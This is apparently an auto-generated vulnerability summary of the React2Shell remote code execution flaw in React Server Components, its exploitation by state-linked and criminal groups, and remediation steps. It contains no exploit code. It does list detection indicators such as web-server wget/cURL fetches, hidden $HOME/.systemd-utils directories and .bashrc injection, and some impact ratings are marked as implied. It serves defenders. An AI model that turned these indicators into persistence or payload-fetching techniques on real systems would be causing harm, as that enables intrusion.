Full Report
Who hasn't exploited this max-severity flaw? At least five more Chinese spy crews, Iran-linked goons, and financially motivated criminals are now attacking the React2Shell, a maximum-severity flaw in the widely used React JavaScript library, according to Google.…
Analysis Summary
# Vulnerability: React2Shell RCE in React JavaScript Library
## CVE Details
- CVE ID: CVE-2025-55182
- CVSS Score: Not explicitly stated, but noted as "maximum-severity flaw"
- CWE: Not explicitly available in the text
## Affected Systems
- Products: React JavaScript library (specifically React Server Components)
- Versions: Vulnerable versions were patched on December 3rd (Implied affected versions precede this date).
- Configurations: Implicated specifically with React Server Components.
## Vulnerability Description
The vulnerability, dubbed "React2Shell," is a maximum-severity flaw within the widely used React JavaScript library. It allows unauthenticated attackers to remotely execute code (RCE).
## Exploitation
- Status: Exploited in the wild (Actively and widely exploited by multiple threat groups, including state-sponsored actors from China and Iran, as well as financially motivated criminals). PoC code has been shared in underground forums.
- Complexity: Low (The text implies ease of exploitation given the immediate and widespread activity following disclosure).
- Attack Vector: Network (Remote execution capability).
## Impact
- Confidentiality: High (Implied, due to deployment of backdoors/tunnelers).
- Integrity: High (Implied, due to deployment of backdoors, miners, and payload delivery).
- Availability: High (Implied, via denial-of-service conditions related to related CVEs, and resource exhaustion from malware like crypto-miners).
## Remediation
### Patches
- Patches were made available by React maintainers on December 3rd. Specific patch versions are not listed, users should consult official React documentation for the latest version incorporating the fix.
### Workarounds
- Monitor network traffic for outbound connections initiated by web server processes, specifically looking for `wget` or `cURL` commands.
- Hunt for newly created hidden directories, such as `$HOME/.systemd-utils`.
- Hunt for unauthorized termination of processes, specifically looking for `ntpclient`.
- Hunt for the injection of malicious execution logic into shell configuration files like `$HOME/.bashrc`.
## Detection
- Indicators of Compromise (IOCs):
- Outbound connections from web server processes using `wget` or `cURL`.
- Newly created hidden directories matching patterns like `$HOME/.systemd-utils`.
- Termination of the `ntpclient` process.
- Malicious code injected into `$HOME/.bashrc`.
- Detection methods and tools: Use threat intelligence (IOCs) provided in Google's report to scan logs and network egress points.
## References
- Vendor advisories: React maintainers released fixes on December 3rd.
- Relevant links:
- (Threat actor exploitation details): hxxps://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182/
- (CVE Record): hxxps://www.cve.org/CVERecord?id=CVE-2025-55182